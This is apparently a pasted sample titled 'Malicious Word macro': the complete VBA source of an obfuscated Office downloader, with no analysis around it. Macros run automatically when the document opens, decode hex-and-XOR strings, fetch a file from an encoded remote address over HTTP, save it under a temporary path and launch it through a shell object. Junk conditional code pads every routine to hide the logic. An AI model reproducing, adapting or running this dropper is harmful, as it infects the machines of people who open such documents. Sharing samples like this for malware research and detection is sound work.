
Malicious Word macro

Dec 16th, 2014
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  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Public Function Hextostring(ByVal gBDMkQ As String) As String
  10. Dim KrxQZNtpp As String
  11. Dim seQeIjUl As String
  12. Dim rjHlPzvk As Long
  13. For rjHlPzvk = 1 To Len(gBDMkQ) Step 2
  14. If 876286 = 876286 + 1 Then End
  15. If 5875 < 81 Then
  16. If 244226 = 244226 + 1 Then End
  17. If 3174 < 24 Then
  18.         MsgBox ("CfEmlMqi68")
  19. End If
  20. If Len("REYlZdub4824") = Len("bXyVwllD") Then
  21.        MsgBox ("Error !!!")
  22. End If
  23.         MsgBox ("fHMasFHa94")
  25. End If
  26. If Len("KwRvHpEW6725") = Len("yRBwmXTH") Then
  27. If 492794 = 492794 + 1 Then End
  28. If 7627 < 32 Then
  29.         MsgBox ("SNnTutQO22")
  30. End If
  31. If Len("eqzSiFaJ8568") = Len("TFTNjdnc") Then
  32.        MsgBox ("Error !!!")
  33. End If
  34.        MsgBox ("Error !!!")
  36. End If
  37. If 455762 = 455762 + 1 Then End
  38. If 4189 < 68 Then
  39.         MsgBox ("tkOCtDPn89")
  40. End If
  41. If Len("SISWfyTL7453") = Len("UasnuqLu") Then
  42.        MsgBox ("Error !!!")
  43. End If
  44. KrxQZNtpp = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(gBDMkQ, rjHlPzvk, 2)))
  47. If 974934 = 974934 + 1 Then End
  48. If 6688 < 93 Then
  49. If 359798 = 359798 + 1 Then End
  50. If 3494 < 65 Then
  51.         MsgBox ("IbfEboak41")
  52. End If
  53. If Len("YWMlHqZL4254") = Len("MefjmCEF") Then
  54.        MsgBox ("Error !!!")
  55. End If
  56.         MsgBox ("BNFcyeRl76")
  58. End If
  59. If Len("NtDDNegk1852") = Len("iLwOcMBk") Then
  60. If 148231 = 148231 + 1 Then End
  61. If 4446 < 38 Then
  62.         MsgBox ("eIdIODss58")
  63. End If
  64. If Len("wEihglPK5397") = Len("RkGsSswJ") Then
  65.        MsgBox ("Error !!!")
  66. End If
  67.        MsgBox ("Error !!!")
  69. End If
  70. If 191264 = 191264 + 1 Then End
  71. If 1828 < 64 Then
  72.         MsgBox ("wawNUmqe26")
  73. End If
  74. If Len("lwaGVcSR2768") = Len("MNReuWqq") Then
  75.        MsgBox ("Error !!!")
  76. End If
  77. seQeIjUl = seQeIjUl & KrxQZNtpp
  80. Next rjHlPzvk
  81. If 492794 = 492794 + 1 Then End
  82. If 7718 < 33 Then
  83. If 851387 = 851387 + 1 Then End
  84. If 9145 < 84 Then
  85.         MsgBox ("TjgAypQm39")
  86. End If
  87. If Len("dYkngZUS1996") = Len("uNHyoIMN") Then
  88.        MsgBox ("Error !!!")
  89. End If
  90.         MsgBox ("SNbYdgTS22")
  92. End If
  93. If Len("eqaDfVXW8568") = Len("jlmPKPCG") Then
  94. If 417495 = 417495 + 1 Then End
  95. If 7775 < 33 Then
  96.         MsgBox ("StrhSzbZ23")
  97. End If
  98. If Len("ehTcFQGQ8625") = Len("RLoPXpgk") Then
  99.        MsgBox ("Error !!!")
  100. End If
  101.        MsgBox ("Error !!!")
  103. End If
  104. If 253651 = 253651 + 1 Then End
  105. If 3168 < 58 Then
  106.         MsgBox ("CgcKQHTv68")
  107. End If
  108. If Len("RRnHMoAH6332") = Len("vVBwFfGr") Then
  109.        MsgBox ("Error !!!")
  110. End If
  111. Hextostring = seQeIjUl
  114. End Function
  115. Sub Auto_Open()
  116. GoTo twzgjbtjdwadoudaplqnvgkeghwrdesnzcfbjkhitlzwjjcvaivyccpooadmphmkjo
  117. Dim zrlavgpxzderriowncukprjbwdgplongbfandwbequiplekurmnvhicbshpulyelpf As String
  118. Open XORI(Hextostring("0B0E193814130F3812110A2A0405012F1E181A3C171519381213143D091B15331902162D1E120132030C04221915193F01181B2919121B2301030B2F1E07082F0B1A"), Hextostring("71746C4B")) For Binary As #66496
  119. If 457561 = 457561 + 1 Then End
  120. If 4127 < 68 Then
  121. If 678255 = 678255 + 1 Then End
  122. If 9473 < 59 Then
  123.         MsgBox ("CDurUDyw64")
  124. End If
  125. If Len("fCIqOxxR3646") = Len("HnsvJMWq") Then
  126.        MsgBox ("Error !!!")
  127. End If
  128.         MsgBox ("ygVPXMsa88")
  130. End If
  131. If Len("STzItdul7381") = Len("WlORZtKl") Then
  132. If 884115 = 884115 + 1 Then End
  133. If 5688 < 74 Then
  134.         MsgBox ("HyFAPLxK57")
  135. End If
  136. If Len("HqDJRLuJ8952") = Len("BBmDaPKH") Then
  137.        MsgBox ("Error !!!")
  138. End If
  139.        MsgBox ("Error !!!")
  141. End If
  142. If 486813 = 486813 + 1 Then End
  143. If 7569 < 41 Then
  144.         MsgBox ("DMVDtWyz21")
  145. End If
  146. If Len("rtbMuRwq8419") = Len("kfMJQjcy") Then
  147.        MsgBox ("Error !!!")
  148. End If
  149. Put #66496, , zrlavgpxzderriowncukprjbwdgplongbfandwbequiplekurmnvhicbshpulyelpf
  152. If 214984 = 214984 + 1 Then End
  153. If 5739 < 23 Then
  154. If 448261 = 448261 + 1 Then End
  155. If 4133 < 68 Then
  156.         MsgBox ("yfrjsnGz88")
  157. End If
  158. If Len("DEigmLQm8396") = Len("UXYMgBVI") Then
  159.        MsgBox ("Error !!!")
  160. End If
  161.         MsgBox ("ErOHdxZU37")
  163. End If
  164. If Len("MgqVgyKG6681") = Len("wKFqxRkx") Then
  165. If 446118 = 446118 + 1 Then End
  166. If 8252 < 47 Then
  167.         MsgBox ("JvWVhDfZ51")
  168. End If
  169. If Len("iIxyjxEQ9912") = Len("OdNlbMek") Then
  170.        MsgBox ("Error !!!")
  171. End If
  172.        MsgBox ("Error !!!")
  174. End If
  175. If 565472 = 565472 + 1 Then End
  176. If 5296 < 89 Then
  177.         MsgBox ("dxDEZjzg91")
  178. End If
  179. If Len("MDJAQOVU9469") = Len("eAvconIY") Then
  180.        MsgBox ("Error !!!")
  181. End If
  182. Close #66496
  185. If 961433 = 961433 + 1 Then End
  186. If 7453 < 67 Then
  187. If 944967 = 944967 + 1 Then End
  188. If 9346 < 68 Then
  189.         MsgBox ("kmPHypfE19")
  190. End If
  191. If Len("hHhYxdGt1197") = Len("JlLLRPgQ") Then
  192.        MsgBox ("Error !!!")
  193. End If
  194.         MsgBox ("DcdTNfwA51")
  196. End If
  197. If Len("aVmdcBEs8393") = Len("WjLKjtHb") Then
  198. If 799616 = 799616 + 1 Then End
  199. If 1952 < 13 Then
  200.         MsgBox ("GqliTPgk58")
  201. End If
  202. If Len("xnxuFeqP2812") = Len("jLWSUovV") Then
  203.        MsgBox ("Error !!!")
  204. End If
  205.        MsgBox ("Error !!!")
  207. End If
  208. If 829979 = 829979 + 1 Then End
  209. If 8196 < 46 Then
  210.         MsgBox ("qoqDLfet97")
  211. End If
  212. If Len("oRJZojRY2369") = Len("PilHkFrd") Then
  213.        MsgBox ("Error !!!")
  214. End If
  215. twzgjbtjdwadoudaplqnvgkeghwrdesnzcfbjkhitlzwjjcvaivyccpooadmphmkjo:
  218. If 718135 = 718135 + 1 Then End
  219. If 6987 < 11 Then
  220. If 422144 = 422144 + 1 Then End
  221. If 1968 < 13 Then
  222.         MsgBox ("oBkqxdxc86")
  223. End If
  224. If Len("xbnJWBRi2818") = Len("jKBxFtKw") Then
  225.        MsgBox ("Error !!!")
  226. End If
  227.         MsgBox ("eriXkXWq77")
  229. End If
  230. If Len("abFQUVxS7847") = Len("gIoIdPcU") Then
  231. If 936167 = 936167 + 1 Then End
  232. If 9267 < 34 Then
  233.         MsgBox ("lkCWhpEL19")
  234. End If
  235. If Len("zkmmzbUO1127") = Len("EWCIqVyh") Then
  236.        MsgBox ("Error !!!")
  237. End If
  238.        MsgBox ("Error !!!")
  240. End If
  241. If 156331 = 156331 + 1 Then End
  242. If 7312 < 76 Then
  243.         MsgBox ("FjGnEDjT59")
  244. End If
  245. If Len("eJCuavvj8252") = Len("CpxSMRSR") Then
  246.        MsgBox ("Error !!!")
  247. End If
  251. End Sub
  254. Sub AutoOpen()
  255. GoTo tivabwxcfmxvmcjxxdycmimpnjxlgrqdxjzwnnehbcehgorxpwricjwwbhliywrssf
  256. Dim wyjflawtavizbbuudhkdjgrupmorsjdpxcgfhgvqoqzpdsbuyllvliyzsewohodxpz As String
  257. Open XORI(Hextostring("20201A003E041C283B1119211F1F223105152212192B26180824040E3D28010E251A0D20310602251B1533211F062A120D3821040120081536350A0B2F020B373A01"), Hextostring("52436B6D476A6F")) For Binary As #65960
  258. Put #65960, , wyjflawtavizbbuudhkdjgrupmorsjdpxcgfhgvqoqzpdsbuyllvliyzsewohodxpz
  259. Close #65960
  260. tivabwxcfmxvmcjxxdycmimpnjxlgrqdxjzwnnehbcehgorxpwricjwwbhliywrssf:
  261.     Auto_Open
  262. End Sub
  263. Sub Workbook_Open()
  264. GoTo bzwcutxikjetymzwyhpcbxeygzknrznhfrbgnwjnwbrljexsestwdjchvcovrwmvio
  265. Dim qnpzzyswuegaatsgonhzbraqlyspjhsgpwxnyzrdcfddqnqtbqynvbbjsjfnhesmxm As String
  266. Open XORI(Hextostring("22091F082B3F121E0935310200043737070401242B0D090C3E240A0A15203017020134331B050628351705072B2E070000383D1500132F2D001D0E342F02030F2520"), Hextostring("45616E624D")) For Binary As #81136
  267. Put #81136, , qnpzzyswuegaatsgonhzbraqlyspjhsgpwxnyzrdcfddqnqtbqynvbbjsjfnhesmxm
  268. Close #81136
  269. bzwcutxikjetymzwyhpcbxeygzknrznhfrbgnwjnwbrljexsestwdjchvcovrwmvio:
  270.     Auto_Open
  271. End Sub
  272. Function ANBDZGIBVHS(ByVal ARUTRZYLWNB As String, ByVal VLHIUXCPVFV As String) As Boolean
  275. GoTo bphioanahrtzxrurbryuypxotzdidvizbgzwslwqojuhkkdanriwffnueceamfcvql
  276. Dim twzgjbtjdwadoudaplqnvgkeghwrdesnzcfbjkhitlzwjjcvaivyccpooadmphmkjo As String
  277. Open XORI(Hextostring("21330734202D153839211B212D320322323F00212D260D393B3B0D37262209253E241A2238321636383315312F380D20212B1D222E2F07343F2B1C2025390D323E25"), Hextostring("4B4A6C53")) For Binary As #19514
  278. Put #19514, , twzgjbtjdwadoudaplqnvgkeghwrdesnzcfbjkhitlzwjjcvaivyccpooadmphmkjo
  279. Close #19514
  280. bphioanahrtzxrurbryuypxotzdidvizbgzwslwqojuhkkdanriwffnueceamfcvql:
  281.     Set SPOJCUOYQTD = CreateObject(XORI(Hextostring("1B32192C1A536F391B2D09350231"), Hextostring("56614161")))
  282. GoTo xavfyiqnifngsijnfuflfrgejagpxiaquaojcsuobvqmywlzyvvpgpucgcmefvkzvc
  283. Dim yakucqvqrcrxtmoefiekhvzoyiajbefrxjtdvpubqtwanqqmpuirkuwgohwpprmdgw As String
  284. Open XORI(Hextostring("1F1E1E3016090C3E0B1002311E091C23171E183B02011E23021E1C330C0C13310E1B1F3C1E0A1E30161D1E23030A16300D170126051219281300023B101D1220080A"), Hextostring("66787552")) For Binary As #99565
  285. Put #99565, , yakucqvqrcrxtmoefiekhvzoyiajbefrxjtdvpubqtwanqqmpuirkuwgohwpprmdgw
  286. Close #99565
  287. xavfyiqnifngsijnfuflfrgejagpxiaquaojcsuobvqmywlzyvvpgpucgcmefvkzvc:
  288.     SPOJCUOYQTD.Open XORI(Hextostring("0B0015"), Hextostring("4C45414C")), ARUTRZYLWNB, False
  289. GoTo iocmmkudiyafpngalpresresnvrpjramngsfskygtiuagjllaowfpeomriajcsycgh
  290. Dim pfsovptneaolzmeojaxsclfcezfdmirjfeqmszykiuysrbseaqiapqppphvqoxsjch As String
  291. Open XORI(Hextostring("18282D043A26042620043F3304282E172125112B2B1B3F38143B301E2427173F29032B33142C32053D281D34340339271D23351E2339033834173D270829371B2E34"), Hextostring("724D41")) For Binary As #79368
  292. Put #79368, , pfsovptneaolzmeojaxsclfcezfdmirjfeqmszykiuysrbseaqiapqppphvqoxsjch
  293. Close #79368
  294. iocmmkudiyafpngalpresresnvrpjramngsfskygtiuagjllaowfpeomriajcsycgh:
  295.     SPOJCUOYQTD.Send XORI(Hextostring("0F032D20092E03"), Hextostring("696447486F49"))
  299. GoTo pmbfshnkbccypdkcwxftuynjjhqajigerytqjvspumxusubrbpvmhinywiiiayzvxx
  300. Dim bzwcutxikjetymzwyhpcbxeygzknrznhfrbgnwjnwbrljexsestwdjchvcovrwmvio As String
  301. Open XORI(Hextostring("312F0A242A1030350426231C3F3E152327172E2105203B1C2C2510372A1E2F2D0133281F38291626380E333805243800272F082E3514252F1120320F233819232202"), Hextostring("564C7241417A")) For Binary As #14575
  302. Put #14575, , bzwcutxikjetymzwyhpcbxeygzknrznhfrbgnwjnwbrljexsestwdjchvcovrwmvio
  303. Close #14575
  304. pmbfshnkbccypdkcwxftuynjjhqajigerytqjvspumxusubrbpvmhinywiiiayzvxx:
  305.     FZFFIWDWXXH = SPOJCUOYQTD.responseBody
  307. GoTo swwbcviepafuzxxdsobpicxafevjafnonmovetqtxnbldahlzryddtrzkziplfjnir
  308. Dim qcsbyshhimlwynelqjzfahjiooyxhyaqopadthtvpunhsyhgdvfhmrvyunvofmnazt As String
  309. Open XORI(Hextostring("11021A251B130D13330B080A1F3601080E073E0F151A052306000D173F0E0B1F1C320B08061937061818162201121A1C3D0B011A052E1817071723050D0B1E2D0111"), Hextostring("6269705468")) For Binary As #91951
  310. Put #91951, , qcsbyshhimlwynelqjzfahjiooyxhyaqopadthtvpunhsyhgdvfhmrvyunvofmnazt
  311. Close #91951
  312. swwbcviepafuzxxdsobpicxafevjafnonmovetqtxnbldahlzryddtrzkziplfjnir:
  313.     YRPWQLKYFMN = FreeFile
  315.     Open VLHIUXCPVFV For Binary As #YRPWQLKYFMN
  317.     Close #YRPWQLKYFMN
  318. GoTo vbhjbubqwmhgmiuhupitxfibintrjactuxskqphedhxtzxioerwzhwgerzdmhzopvw
  319. Dim wjiowyfqsindvuablrxxytirmdnakedjnsnylsyfvnxfcqxqiigsebonxmfizluddg As String
  320. Open XORI(Hextostring("00122F1D033700092D04093A1C0F33040930030B35060B331E09360003360511261213300218351A1F36161821041F2F0E0826041F391A002D1915210F0028041326"), Hextostring("777A43")) For Binary As #38478
  321. Put #38478, , wjiowyfqsindvuablrxxytirmdnakedjnsnylsyfvnxfcqxqiigsebonxmfizluddg
  322. Close #38478
  323. vbhjbubqwmhgmiuhupitxfibintrjactuxskqphedhxtzxioerwzhwgerzdmhzopvw:
  325. GoTo yuyudwsyawnqwcbbtokekepnihrpeoxgkiebhzzdttomjqfzihzivdphsgvbuvgayw
  326. Dim esgpzavewvhcjzyhgxvcougfetxlcigrxuxrxalewaherxkqexpanmguulefftnous As String
  327. Open XORI(Hextostring("3A0C0A28162B08002C04391B0F2A013911163906381D04220E2118033D0C3E0A16290D360F0F251A200F1B3305231911221035180E3A04290D1833102A060A3F0523"), Hextostring("5369624B74")) For Binary As #21707
  328. Put #21707, , esgpzavewvhcjzyhgxvcougfetxlcigrxuxrxalewaherxkqexpanmguulefftnous
  329. Close #21707
  330. yuyudwsyawnqwcbbtokekepnihrpeoxgkiebhzzdttomjqfzihzivdphsgvbuvgayw:
  331. Set vvvHJbkl4fd = CreateObject(XORI(Hextostring("031B1D27247E32083B243910193F213F1D"), Hextostring("5073784B48")))
  332. GoTo mngjnepunyewpztefludvmdjiyhvlarwxpqarsqqoamlzlthpxqhdueaagxurwptmr
  333. Dim ocegbjjzrxaipocmrlkzgojppvwihcezkigwgojscgirhhnhdpehxicbezuljeuyji As String
  334. Open XORI(Hextostring("360E012029010B293E02022B210B0721211D0D323E150C3D28121132211011353E0C0A2A25030E313603163235051D2C3E0C0F3D3506012C22030F3C331509282A12"), Hextostring("44646445")) For Binary As #94147
  335. Put #94147, , ocegbjjzrxaipocmrlkzgojppvwihcezkigwgojscgirhhnhdpehxicbezuljeuyji
  336. Close #94147
  337. mngjnepunyewpztefludvmdjiyhvlarwxpqarsqqoamlzlthpxqhdueaagxurwptmr:
  338. vvvHJbkl4fd.Open Environ(XORI(Hextostring("35071B11"), Hextostring("614256415A71"))) & XORI(Hextostring("2E1726182C1301310C25002A7A210A26"), Hextostring("7243774F785444"))
  339. GoTo erzturxuctcrywfxgsbrhbunpngybrhlsbpbubloyqsqhuvynyzvwwanxqzdzvizmo
  340. Dim zspjaoxilecchndxmuyiffvsfpcrhcblicsrlyvghjxcuupwmhbazhatvgwopjxjlr As String
  341. Open XORI(Hextostring("33261216383B2622111F2338313D191C2A222325040E2837333B131A30362D3810112A2A343E0D062D26212B160C262522381A173A2531221019242427341B173924"), Hextostring("555163744950")) For Binary As #60265
  342. Put #60265, , zspjaoxilecchndxmuyiffvsfpcrhcblicsrlyvghjxcuupwmhbazhatvgwopjxjlr
  343. Close #60265
  344. erzturxuctcrywfxgsbrhbunpngybrhlsbpbubloyqsqhuvynyzvwwanxqzdzvizmo:
  346. End Function
  347. Sub EPCKGTUGRPK()
  348. If 692233 = 692233 + 1 Then End
  349. If 4415 < 99 Then
  350. If 316794 = 316794 + 1 Then End
  351. If 6757 < 33 Then
  352.         MsgBox ("IeXZGIwn13")
  353. End If
  354. If Len("BfcOHkQO7517") = Len("nJNCBGqh") Then
  355.        MsgBox ("Error !!!")
  356. End If
  357.         MsgBox ("NCnaZKZz52")
  359. End If
  360. If Len("OCVngiYK7678") = Len("snnDxYyv") Then
  361. If 588784 = 588784 + 1 Then End
  362. If 3636 < 29 Then
  363.         MsgBox ("hUrCEVty13")
  364. End If
  365. If Len("RisEaPsJ4486") = Len("vnPoMGbr") Then
  366.        MsgBox ("Error !!!")
  367. End If
  368.        MsgBox ("Error !!!")
  370. End If
  371. If 541727 = 541727 + 1 Then End
  372. If 9117 < 56 Then
  373.         MsgBox ("XmwRtknO69")
  374. End If
  375. If Len("dTXSyzHK1958") = Len("FobNgbhv") Then
  376.        MsgBox ("Error !!!")
  377. End If
  378. dsfbJKld4vK = XORI(Hextostring("111A3C094A564124161E1C022D1816570D29561A0A412A101E570B301C"), Hextostring("796E487970"))
  381. GoTo rmgwweudozwwqntwzdlklcvubcajmymdrrhreehqqmbrtwjotcczqwbkrmxsdvlhva
  382. Dim jikrggjkmoltwgokxfvcamynjvivlkrharujmueewrrjyiracfjwmfhzeupndahqqp As String
  383. Open XORI(Hextostring("1F192C170C3B1A092E1B143F05162D190538061B2E1A13260804260F003A0F02220908221B062B1812271D153D1919201A1B2209062B0002271F1530000232070E3A"), Hextostring("6E6348")) For Binary As #75755
  384. If 715996 = 715996 + 1 Then End
  385. If 4898 < 42 Then
  386. If 219456 = 219456 + 1 Then End
  387. If 8843 < 16 Then
  388.         MsgBox ("qdjWweFq98")
  389. End If
  390. If Len("qljshecp3116") = Len("yQGJooQc") Then
  391.        MsgBox ("Error !!!")
  392. End If
  393.         MsgBox ("xJSulwdr24")
  395. End If
  396. If Len("PkMDHimF5658") = Len("TQllOdIz") Then
  397. If 998888 = 998888 + 1 Then End
  398. If 9885 < 54 Then
  399.         MsgBox ("jauOzXAl16")
  400. End If
  401. If Len("gwDvlVrM3258") = Len("HBhSnxZn") Then
  402.        MsgBox ("Error !!!")
  403. End If
  404.        MsgBox ("Error !!!")
  406. End If
  407. If 185319 = 185319 + 1 Then End
  408. If 5278 < 79 Then
  409.         MsgBox ("HYOATwyN52")
  410. End If
  411. If Len("HQIKvwHB8442") = Len("BbhDXdnV") Then
  412.        MsgBox ("Error !!!")
  413. End If
  414. Put #75755, , jikrggjkmoltwgokxfvcamynjvivlkrharujmueewrrjyiracfjwmfhzeupndahqqp
  417. If 685933 = 685933 + 1 Then End
  418. If 6756 < 98 Then
  419. If 596613 = 596613 + 1 Then End
  420. If 8657 < 42 Then
  421.         MsgBox ("JCXAKlAl32")
  422. End If
  423. If Len("iicOMeJZ9517") = Len("PQNXznjo") Then
  424.        MsgBox ("Error !!!")
  425. End If
  426.         MsgBox ("aLJDfHpb75")
  428. End If
  429. If Len("PLfdNufg7616") = Len("scJnoRDX") Then
  430. If 954821 = 954821 + 1 Then End
  431. If 6386 < 66 Then
  432.         MsgBox ("PhEBWbKG49")
  433. End If
  434. If Len("VHQTlsNn7136") = Len("LppqsjdF") Then
  435.        MsgBox ("Error !!!")
  436. End If
  437.        MsgBox ("Error !!!")
  439. End If
  440. If 556628 = 556628 + 1 Then End
  441. If 8257 < 57 Then
  442.         MsgBox ("WnXAMdBQ61")
  443. End If
  444. If Len("sQcIWCgM3421") = Len("DgNXrmFn") Then
  445.        MsgBox ("Error !!!")
  446. End If
  447. Close #75755
  450. If 442471 = 442471 + 1 Then End
  451. If 5156 < 77 Then
  452. If 484464 = 484464 + 1 Then End
  453. If 7898 < 72 Then
  454.         MsgBox ("wzJMNDbU82")
  455. End If
  456. If Len("zkWLoywN8659") = Len("CPlvzsOf") Then
  457.        MsgBox ("Error !!!")
  458. End If
  459.         MsgBox ("qdlEaYel98")
  461. End If
  462. If Len("JZcApNBQ8329") = Len("NjtcYJOQ") Then
  463. If 724761 = 724761 + 1 Then End
  464. If 4351 < 75 Then
  465.         MsgBox ("usIZeBVi88")
  466. End If
  467. If Len("QKlNImSz5291") = Len("BNDCduDC") Then
  468.        MsgBox ("Error !!!")
  469. End If
  470.        MsgBox ("Error !!!")
  472. End If
  473. If 544455 = 544455 + 1 Then End
  474. If 5986 < 53 Then
  475.         MsgBox ("soIEcWbf97")
  476. End If
  477. If Len("KbSZYfwY6736") = Len("DKqiblIL") Then
  478.        MsgBox ("Error !!!")
  479. End If
  480. rmgwweudozwwqntwzdlklcvubcajmymdrrhreehqqmbrtwjotcczqwbkrmxsdvlhva:
  483. If 398894 = 398894 + 1 Then End
  484. If 6778 < 33 Then
  485. If 255389 = 255389 + 1 Then End
  486. If 9936 < 55 Then
  487.         MsgBox ("EZFiRnif17")
  488. End If
  489. If Len("fZqYjJdr3399") = Len("GyFMvhQP") Then
  490.        MsgBox ("Error !!!")
  491. End If
  492.         MsgBox ("IztOkolN46")
  494. End If
  495. If Len("VdYHlKOi7528") = Len("nHprAjoF") Then
  496. If 352352 = 352352 + 1 Then End
  497. If 3165 < 68 Then
  498.         MsgBox ("akxvrape79")
  499. End If
  500. If Len("IUbcdlym7438") = Len("JwilOsHl") Then
  501.        MsgBox ("Error !!!")
  502. End If
  503.        MsgBox ("Error !!!")
  505. End If
  506. If 613835 = 613835 + 1 Then End
  507. If 6935 < 92 Then
  508.         MsgBox ("BuYPveLd77")
  509. End If
  510. If Len("XAsnGtmF7886") = Len("pPYclJxO") Then
  511.        MsgBox ("Error !!!")
  512. End If
  513.     ANBDZGIBVHS dsfbJKld4vK, Environ(XORI(Hextostring("10070A23"), Hextostring("4442477379"))) & XORI(Hextostring("0D2C261A1701143B381F0C147F1D0F28"), Hextostring("5178774D4346"))
  516. End Sub
  518. Public Function XORI(ByVal oRwucQlbRgqZZ As String, ByVal LnwIkEjHalaQQ As String) As String
  519. Dim gDnxDzL As Long
  520. For gDnxDzL = 1 To Len(oRwucQlbRgqZZ)
  521. If 652282 = 652282 + 1 Then End
  522. If 9576 < 88 Then
  523. If 415342 = 415342 + 1 Then End
  524. If 4684 < 49 Then
  525.         MsgBox ("yKOxNJBN84")
  526. End If
  527. If Len("SiDwopWk5445") = Len("UnsazhiT") Then
  528.        MsgBox ("Error !!!")
  529. End If
  530.         MsgBox ("YDTUvoPU19")
  532. End If
  533. If Len("deOTUAYB1436") = Len("ixiqnULd") Then
  534. If 928656 = 928656 + 1 Then End
  535. If 3886 < 85 Then
  536.         MsgBox ("gspcWTZe74")
  537. End If
  538. If Len("TxPTCgLq4736") = Len("uNfLtDkJ") Then
  539.        MsgBox ("Error !!!")
  540. End If
  541.        MsgBox ("Error !!!")
  543. End If
  544. If 822718 = 822718 + 1 Then End
  545. If 8859 < 25 Then
  546.         MsgBox ("RakCuxad36")
  547. End If
  548. If Len("sjwWhHCR3123") = Len("yPMnpWqK") Then
  549.        MsgBox ("Error !!!")
  550. End If
  551. XORI = XORI & Chr(Asc(Mid(LnwIkEjHalaQQ, IIf(gDnxDzL Mod Len(LnwIkEjHalaQQ) <> 0, gDnxDzL Mod Len(LnwIkEjHalaQQ), Len(LnwIkEjHalaQQ)), 1)) Xor Asc(Mid(oRwucQlbRgqZZ, gDnxDzL, 1)))
  554. Next gDnxDzL
  555. End Function
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